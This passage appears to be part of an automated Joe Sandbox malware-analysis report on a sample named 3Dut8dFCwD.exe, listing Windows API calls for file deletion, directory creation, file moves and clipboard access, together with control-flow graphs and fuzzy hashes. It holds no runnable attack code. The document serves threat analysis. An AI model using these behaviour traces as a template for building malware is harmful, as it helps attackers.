                                • Part of subcall function 00405FFF: GetFileAttributesW.KERNELBASE(?,?,00405C04,?,?,00000000,00405DDA,?,?,?,?), ref: 00406004
                                • Part of subcall function 00405FFF: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406018
                              • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405DDA), ref: 00405C13
                              • DeleteFileW.KERNELBASE(?,?,?,00000000,00405DDA), ref: 00405C1B
                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C33
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: File$Attributes$DeleteDirectoryRemove
                              • String ID:
                              • API String ID: 1655745494-0
                              • Opcode ID: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
                              • Instruction ID: 5e01d24d9a9add2734d853181832f52676860c459c8436f1574cfa514314cc42
                              • Opcode Fuzzy Hash: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
                              • Instruction Fuzzy Hash: 34E0653111DB9556E3206B359E0CA6B29D8DF86724F05093EF491B21D0DB78484A8AAD

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 630 401389-40138e 631 4013fa-4013fc 630->631 632 401390-4013a0 631->632 633 4013fe 631->633 632->633 635 4013a2-4013a3 call 401434 632->635 634 401400-401401 633->634 637 4013a8-4013ad 635->637 638 401404-401409 637->638 639 4013af-4013b7 call 40136d 637->639 638->634 642 4013b9-4013bb 639->642 643 4013bd-4013c2 639->643 644 4013c4-4013c9 642->644 643->644 644->631 645 4013cb-4013f4 MulDiv SendMessageW 644->645 645->631
                              APIs
                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                              • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID:
                              • API String ID: 3850602802-0
                              • Opcode ID: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
                              • Instruction ID: cd791cecd07b1aef7d4b508d0a52a2ac0ec5e235a68ccce80931b69816989e44
                              • Opcode Fuzzy Hash: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
                              • Instruction Fuzzy Hash: 6301F4326242109BE7195B389D05B6B36A8F791314F10863FF955F62F1DA78CC42DB4D

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 646 405a88-405ad2 CreateDirectoryW 647 405ad4-405ad6 646->647 648 405ad8 GetLastError 646->648 649 405ade-405adf 647->649 648->649
                              APIs
                              • CreateDirectoryW.KERNELBASE(007AB800,?), ref: 00405ACA
                              • GetLastError.KERNEL32 ref: 00405AD8
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: CreateDirectoryErrorLast
                              • String ID:
                              • API String ID: 1375471231-0
                              • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                              • Instruction ID: a317670bc0344c02bc4a283170babb3afb7c1cf0ece08f5f419864d791fc675b
                              • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                              • Instruction Fuzzy Hash: 6CF0F4B0D0064EDADB00DFA4C6487EFBBB4EB04309F10812AD941B6281D7B882488FA9
                              APIs
                              • GetModuleHandleA.KERNEL32(?,00000020,?,0040361F,0000000C,?,?,?,?,?,?,?,?), ref: 0040693A
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406955
                                • Part of subcall function 004068B8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068CF
                                • Part of subcall function 004068B8: wsprintfW.USER32 ref: 0040690A
                                • Part of subcall function 004068B8: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040691E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                              • String ID:
                              • API String ID: 2547128583-0
                              • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                              • Instruction ID: 3558e7e07fc8bc3cb8e2ee1445b58ac947b9e1d3522fe80aecf0cccf78f5b58a
                              • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                              • Instruction Fuzzy Hash: C7E08673504211ABD2106A705E04C2777AD9F85750302443EF946F2140D774DC32A76D
                              APIs
                              • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\3Dut8dFCwD.exe,80000000,00000003), ref: 00406028
                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040604A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: File$AttributesCreate
                              • String ID:
                              • API String ID: 415043291-0
                              • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                              • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                              • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                              • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                              APIs
                              • GetFileAttributesW.KERNELBASE(?,?,00405C04,?,?,00000000,00405DDA,?,?,?,?), ref: 00406004
                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406018
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                              • Instruction ID: b044de85d095277e3e8e37393dee7a1aab5cccde4b3e14dcc7f467a135196144
                              • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                              • Instruction Fuzzy Hash: C7D0C972505220AFC2103B28EE0889BBB55DB54271B028A35FCA9A22B0CB304C669A94
                              APIs
                              • CloseHandle.KERNEL32(FFFFFFFF,00403A5F,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B37
                              Strings
                              • C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\, xrefs: 00403B4B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: CloseHandle
                              • String ID: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\
                              • API String ID: 2962429428-3461479535
                              • Opcode ID: 75b6059274c34f4acd1c30ca659bcafdfbceb07ace89e443466d463c647567ff
                              • Instruction ID: 56a8d231df6e1f4919b80352f74fca15e45824bb5242f2e67795a820b0309f86
                              • Opcode Fuzzy Hash: 75b6059274c34f4acd1c30ca659bcafdfbceb07ace89e443466d463c647567ff
                              • Instruction Fuzzy Hash: C9C0123054470496D5247F799D4FE453A249740739B908325B2B9B40F2C73C5659596D
                              APIs
                              • CreateDirectoryW.KERNELBASE(?,00000000,00403502,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00405AE8
                              • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405AF6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: CreateDirectoryErrorLast
                              • String ID:
                              • API String ID: 1375471231-0
                              • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                              • Instruction ID: 7753466ba62b5dbc1ec3a25bc90d7dba0bbd887294648da7d021985784af3e89
                              • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                              • Instruction Fuzzy Hash: 9FC04C70308906DAD6505B619F4871B7950AB50741F154939A986E50E0DA748495EE2D
                              APIs
                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040347A,00000000,00793700,000000FF,00793700,000000FF,000000FF,00000004,00000000), ref: 004060EA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: FileWrite
                              • String ID:
                              • API String ID: 3934441357-0
                              • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                              • Instruction ID: b33f9baa58445403e377b25cdb553cbb5220209f8a97e81f67fdd09438c35695
                              • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                              • Instruction Fuzzy Hash: 80E08C3225021ABBDF109F54CC00EEB3B6CEB043A0F018437F916E2060D670E930A7A8
                              APIs
                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034C4,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060BB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID:
                              • API String ID: 2738559852-0
                              • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                              • Instruction ID: 39ae2bf48dd7ef05cc95990c5189398c44bf694af0d2be0d7958e68ccb6b0415
                              • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                              • Instruction Fuzzy Hash: 54E08C3226126AABCF10DF508C00EEB3BACEF043A0F014432F912E3080DA30E92197A9
                              APIs
                              • MoveFileExW.KERNELBASE(?,?,00000005,00405DF2,?,00000000,000000F1,?,?,?,?,?), ref: 004062FE
                                • Part of subcall function 0040617A: CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406315,?,?), ref: 004061B5
                                • Part of subcall function 0040617A: GetShortPathNameW.KERNEL32(?,007A4DE8,00000400), ref: 004061BE
                                • Part of subcall function 0040617A: GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061DB
                                • Part of subcall function 0040617A: wsprintfA.USER32 ref: 004061F9
                                • Part of subcall function 0040617A: GetFileSize.KERNEL32(00000000,00000000,007A55E8,C0000000,00000004,007A55E8,?,?,?,?,?), ref: 00406234
                                • Part of subcall function 0040617A: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406243
                                • Part of subcall function 0040617A: lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040627B
                                • Part of subcall function 0040617A: SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A49E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062D1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: File$NamePathShort$AllocCloseGlobalHandleMovePointerSizelstrcpywsprintf
                              • String ID:
                              • API String ID: 1930046112-0
                              • Opcode ID: 1e4010844bb8ba65faee9067da085bc24f8460d998ee42ad1bb04f80e0c5d623
                              • Instruction ID: 441f6a94ec63c8a803b4d3fb3af655611ae8c98ae086b365179572a1c2ea722f
                              • Opcode Fuzzy Hash: 1e4010844bb8ba65faee9067da085bc24f8460d998ee42ad1bb04f80e0c5d623
                              • Instruction Fuzzy Hash: 03D09E32108601AEDA511B50DD05A1B7FB1BF94355F11C42EF585540B1DB358861DF09
                              APIs
                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034D5
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: FilePointer
                              • String ID:
                              • API String ID: 973152223-0
                              • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                              • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                              • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                              • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                              APIs
                              • GetDlgItem.USER32(?,00000403), ref: 00405756
                              • GetDlgItem.USER32(?,000003EE), ref: 00405765
                              • GetClientRect.USER32(?,?), ref: 004057A2
                              • GetSystemMetrics.USER32(00000002), ref: 004057A9
                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057CA
                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057DB
                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057EE
                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057FC
                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040580F
                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405831
                              • ShowWindow.USER32(?,00000008), ref: 00405845
                              • GetDlgItem.USER32(?,000003EC), ref: 00405866
                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405876
                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040588F
                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040589B
                              • GetDlgItem.USER32(?,000003F8), ref: 00405774
                                • Part of subcall function 004044E8: SendMessageW.USER32(00000028,?,00000001,00404313), ref: 004044F6
                              • GetDlgItem.USER32(?,000003EC), ref: 004058B8
                              • CreateThread.KERNEL32(00000000,00000000,Function_0000568C,00000000), ref: 004058C6
                              • CloseHandle.KERNEL32(00000000), ref: 004058CD
                              • ShowWindow.USER32(00000000), ref: 004058F1
                              • ShowWindow.USER32(?,00000008), ref: 004058F6
                              • ShowWindow.USER32(00000008), ref: 00405940
                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405974
                              • CreatePopupMenu.USER32 ref: 00405985
                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405999
                              • GetWindowRect.USER32(?,?), ref: 004059B9
                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059D2
                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A0A
                              • OpenClipboard.USER32(00000000), ref: 00405A1A
                              • EmptyClipboard.USER32 ref: 00405A20
                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A2C
                              • GlobalLock.KERNEL32(00000000), ref: 00405A36
                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A4A
                              • GlobalUnlock.KERNEL32(00000000), ref: 00405A6A
                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405A75
                              • CloseClipboard.USER32 ref: 00405A7B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
